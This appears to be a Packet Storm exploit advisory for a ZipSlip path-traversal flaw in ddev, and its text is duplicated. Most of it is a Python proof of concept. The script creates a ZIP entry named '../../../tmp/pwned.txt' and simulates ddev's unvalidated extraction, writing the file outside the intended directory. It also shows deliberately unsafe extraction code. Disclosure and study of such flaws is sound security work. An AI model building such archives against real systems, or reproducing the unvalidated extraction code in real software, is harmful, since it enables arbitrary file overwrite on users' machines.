Description
A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines. The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file...
Basic Information
ID
PACKETSTORM:219071
Published
Apr 17, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : ddev ZipSlip Path Traversal – Arbitrary File Write via Malicious Archive |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines.
The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
[+] POC :
#!/usr/bin/env python3
import zipfile
import os
OUTPUT_ZIP = "exploit.zip"
PAYLOAD_PATH = "../../../tmp/pwned.txt"
PAYLOAD_CONTENT = "HACKED: ZipSlip successful!\n"
def create_malicious_zip():
print("[*] Creating malicious ZIP...")
with zipfile.ZipFile(OUTPUT_ZIP, 'w', zipfile.ZIP_DEFLATED) as z:
z.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
print(f"[+] Malicious archive created: {OUTPUT_ZIP}")
print(f"[+] Payload path inside archive: {PAYLOAD_PATH}")
def simulate_vulnerable_extract(dest):
"""
Simulates vulnerable ddev behavior
(filepath.Join without validation)
"""
print(f"\n[*] Simulating vulnerable extraction to: {dest}")
with zipfile.ZipFile(OUTPUT_ZIP, 'r') as z:
for file in z.infolist():
extracted_path = os.path.join(dest, file.filename)
print(f"[!] Writing to: {extracted_path}")
os.makedirs(os.path.dirname(extracted_path), exist_ok=True)
with open(extracted_path, "wb") as f:
f.write(z.read(file.filename))
def check_result():
target = "/tmp/pwned.txt"
print("\n[*] Checking result...")
if os.path.exists(target):
print(f"[+] SUCCESS: File written Off the track: {target}")
with open(target) as f:
print("[+] Content:", f.read())
else:
print("[-] Exploit failed")
if __name__ == "__main__":
create_malicious_zip()
safe_dir = "./safe_extract"
os.makedirs(safe_dir, exist_ok=True)
simulate_vulnerable_extract(safe_dir)
check_result()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : ddev ZipSlip Path Traversal – Arbitrary File Write via Malicious Archive |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines.
The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
[+] POC :
#!/usr/bin/env python3
import zipfile
import os
OUTPUT_ZIP = "exploit.zip"
PAYLOAD_PATH = "../../../tmp/pwned.txt"
PAYLOAD_CONTENT = "HACKED: ZipSlip successful!\n"
def create_malicious_zip():
print("[*] Creating malicious ZIP...")
with zipfile.ZipFile(OUTPUT_ZIP, 'w', zipfile.ZIP_DEFLATED) as z:
z.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
print(f"[+] Malicious archive created: {OUTPUT_ZIP}")
print(f"[+] Payload path inside archive: {PAYLOAD_PATH}")
def simulate_vulnerable_extract(dest):
"""
Simulates vulnerable ddev behavior
(filepath.Join without validation)
"""
print(f"\n[*] Simulating vulnerable extraction to: {dest}")
with zipfile.ZipFile(OUTPUT_ZIP, 'r') as z:
for file in z.infolist():
extracted_path = os.path.join(dest, file.filename)
print(f"[!] Writing to: {extracted_path}")
os.makedirs(os.path.dirname(extracted_path), exist_ok=True)
with open(extracted_path, "wb") as f:
f.write(z.read(file.filename))
def check_result():
target = "/tmp/pwned.txt"
print("\n[*] Checking result...")
if os.path.exists(target):
print(f"[+] SUCCESS: File written Off the track: {target}")
with open(target) as f:
print("[+] Content:", f.read())
else:
print("[-] Exploit failed")
if __name__ == "__main__":
create_malicious_zip()
safe_dir = "./safe_extract"
os.makedirs(safe_dir, exist_ok=True)
simulate_vulnerable_extract(safe_dir)
check_result()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================